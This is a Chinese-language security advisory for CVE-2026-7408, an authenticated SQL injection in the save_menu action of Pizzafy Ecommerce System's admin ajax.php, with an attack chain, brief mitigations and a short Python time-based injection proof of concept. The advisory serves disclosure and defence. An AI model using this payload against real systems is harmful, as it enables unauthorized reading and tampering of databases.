IPBUF安全漏洞报告
English
CVE-2026-7408 CVSS 4.7 中危

CVE-2026-7408 Pizzafy电商系统SQL注入漏洞

披露日期: 2026-04-29

漏洞信息

漏洞编号
CVE-2026-7408
漏洞类型
SQL注入
CVSS评分
4.7 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester Pizzafy Ecommerce System

相关标签

SQL注入PizzafySourceCodesterWeb安全CVE-2026-7408

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0版本中的/admin/ajax.php文件存在SQL注入漏洞。攻击者可利用save_menu函数参数执行恶意SQL语句。该漏洞需高权限且可远程利用,可能导致数据泄露或篡改。

技术细节

该漏洞位于Pizzafy电商系统的后台管理接口。由于/admin/ajax.php文件的save_menu动作未对用户输入进行充分的过滤或转义,直接拼接SQL语句,导致SQL注入漏洞。虽然利用此漏洞需要管理员级别权限(PR:H),但一旦认证通过,攻击者可通过发送特制的HTTP POST请求,操纵数据库查询,从而窃取敏感信息、修改数据或执行其他数据库操作。

攻击链分析

STEP 1
侦察
识别目标为SourceCodester Pizzafy Ecommerce System 1.0。
STEP 2
获取权限
通过钓鱼或弱口令获取管理员账户凭证(因漏洞利用需高权限)。
STEP 3
漏洞利用
使用管理员Cookie向/admin/ajax.php?action=save_menu发送包含SQL注入代码的POST请求。
STEP 4
数据操作
执行SQL语句读取敏感数据或修改数据库内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://localhost/admin/ajax.php?action=save_menu" # SQL Injection Payload payload = { "menu_name": "Test' OR SLEEP(5)-- -", "price": "10", "category": "1" } # Admin session cookie (Required due to PR:H) cookies = { "PHPSESSID": "valid_admin_session_id" } try: response = requests.post(url, data=payload, cookies=cookies) if response.elapsed.total_seconds() >= 5: print("[+] SQL Injection Successful (Time-based)") else: print("[-] Exploit failed or patched") except Exception as e: print(f"Error: {e}")

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施
建议在WAF中部署针对该接口的SQL注入防护规则,并限制后台管理系统的IP访问范围,仅允许可信IP连接。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表